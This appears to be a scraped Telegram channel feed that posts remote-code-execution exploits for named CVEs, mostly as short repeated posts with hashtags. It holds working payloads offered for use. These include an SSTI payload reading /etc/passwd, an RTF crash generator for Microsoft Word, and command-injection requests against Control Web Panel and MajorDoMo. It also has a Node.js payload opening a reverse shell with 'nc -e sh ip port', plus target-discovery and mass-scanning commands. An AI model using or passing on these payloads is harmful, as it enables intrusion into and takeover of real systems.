SSTI to RCE:
#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
curl -X POST http://test.com:8080 -H "Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k" --data "name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}"#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC
#CVE #RCE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))#CVE #RCE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-25135: Pre-authentication RCE
Github
#CVE #RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-28311 ( Microsoft Word Remote Code Execution Vulnerability )
Github
#CVE #Windows #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Windows #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-22956 - CVE-2022-22957 ( VMware Workspace ONE RCE )
Link
#Exploit #CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#Exploit #CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Packetstormsecurity
VMware Workspace ONE Remote Code Execution ≈ Packet Storm
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
CVE-2022-44877
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
whoami.{{interactsh-url}}) HTTP/1.1Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2023-20887
VMWare vRealize Network Insight Pre-Authenticated RCE
Github
#rce #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
VMWare vRealize Network Insight Pre-Authenticated RCE
Github
#rce #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-34039-main.zip
126.9 KB
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Forwarded from hr
CVE-2023-36745: Microsoft Exchange Server RCE CVE-2023-36745
read
Poc
#cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
read
Poc
#cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Cybersecurity News
Microsoft Exchange Server RCE (CVE-2023-36745) Flaw Gets PoC Exploit
Proof-of-concept (PoC) exploit code has been published for a Microsoft Exchange Server vulnerability tracked as CVE-2023-36745
CVE-2023-49070 - Pre-auth RCE in Apache Ofbiz 18.12.09
Github
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC
Contribute to abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC development by creating an account on GitHub.
CVE-2022-1040 - RCE in Sophos Firewall
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
curl -sk -H "X-Requested-With: XMLHttpRequest" -X POST 'hxxps://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"x":"test"\}' | grep -q 'Session Expired'#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
reflected XSS to RCE
Payload:
#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
"><img src=x onerror=alert(whoami)>#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-26360 - Unauthenticated RCE in Adobe Coldfusion
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Penetration Testing and CyberSecurity Solution - SecureLayer7
Unauthenticated RCE in Adobe Coldfusion – CVE-2023-26360
Overview CVE-2023-263060 was exploited in the wild in Adobe ColdFusion product, a commercial application server for rapid web application development. The vulnerability affects both the 2018 and...
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)
Github
#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
MajorDoMo thumb RCE
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
If you discover a node.js template area, you should try triggerable node payload 🔥; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}
so you can get RCE 💎
#rce #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
so you can get RCE 💎
#rce #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Exploits Symfony
httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
Github
#Exploit #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
Github
#Exploit #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army